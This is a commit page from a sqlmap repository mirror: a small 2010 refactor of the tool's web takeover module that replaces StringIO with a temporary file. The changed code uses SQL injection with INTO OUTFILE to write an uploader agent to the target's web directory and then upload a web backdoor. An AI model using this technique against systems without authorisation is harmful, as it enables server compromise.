sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-11-04 18:07:46 +03:00
Code Issues Packages Projects Releases Wiki Activity

quick fix regarding usage of StringIO instead of file stream

Browse Source
This commit is contained in:
Miroslav Stampar 2010-01-27 15:44:35 +00:00
parent a0eabb6719
commit f8056f4098
1 changed files with 9 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
lib/takeover/web.py
View File

@ -24,7 +24,7 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import os import os
import re import re
import StringIO from tempfile import TemporaryFile
from lib.core.agent import agent from lib.core.agent import agent
from lib.core.common import fileToStr from lib.core.common import fileToStr
@ -77,10 +77,10 @@ class Web:
def webFileUpload(self, fileToUpload, destFileName, directory): def webFileUpload(self, fileToUpload, destFileName, directory):
file = open(fileToUpload, "r") file = open(fileToUpload, "r")
webStreamUpload(self, file, destFileName, directory) webFileStreamUpload(self, file, destFileName, directory)
file.close() file.close()
def webStreamUpload(self, stream, destFileName, directory): def webFileStreamUpload(self, stream, destFileName, directory):
if self.webApi == "php": if self.webApi == "php":
multipartParams = { multipartParams = {
"upload": "1", "upload": "1",
@ -157,17 +157,17 @@ class Web:
logger.warn("invalid value, it must be 1 or 3") logger.warn("invalid value, it must be 1 or 3")
backdoorName = "backdoor.%s" % self.webApi backdoorName = "backdoor.%s" % self.webApi
backdoorStream = StringIO.StringIO(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, backdoorName + '_'))) backdoorStream = TemporaryFile()
backdoorStream.write(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, backdoorName + '_')))
backdoorStream.seek(0)
uploaderName = "uploader.%s" % self.webApi uploaderName = "uploader.%s" % self.webApi
uploaderStream = StringIO.StringIO(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, uploaderName + '_'))) uploaderContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, uploaderName + '_'))
uploaderStr = uploaderStream.read()
for directory in directories: for directory in directories:
# Upload the uploader agent # Upload the uploader agent
outFile = os.path.normpath("%s/%s" % (directory, uploaderName)) outFile = os.path.normpath("%s/%s" % (directory, uploaderName))
uplQuery = uploaderStr.replace("WRITABLE_DIR", directory) uplQuery = uploaderContent.replace("WRITABLE_DIR", directory)
query = " LIMIT 1 INTO OUTFILE '%s' " % outFile query = " LIMIT 1 INTO OUTFILE '%s' " % outFile
query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery) query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
query = agent.prefixQuery(" %s" % query) query = agent.prefixQuery(" %s" % query)
@ -192,7 +192,7 @@ class Web:
infoMsg += "on '%s'" % directory infoMsg += "on '%s'" % directory
logger.info(infoMsg) logger.info(infoMsg)
self.webStreamUpload(backdoorStream, backdoorName, directory) self.webFileStreamUpload(backdoorStream, backdoorName, directory)
self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName) self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName)
self.webDirectory = directory self.webDirectory = directory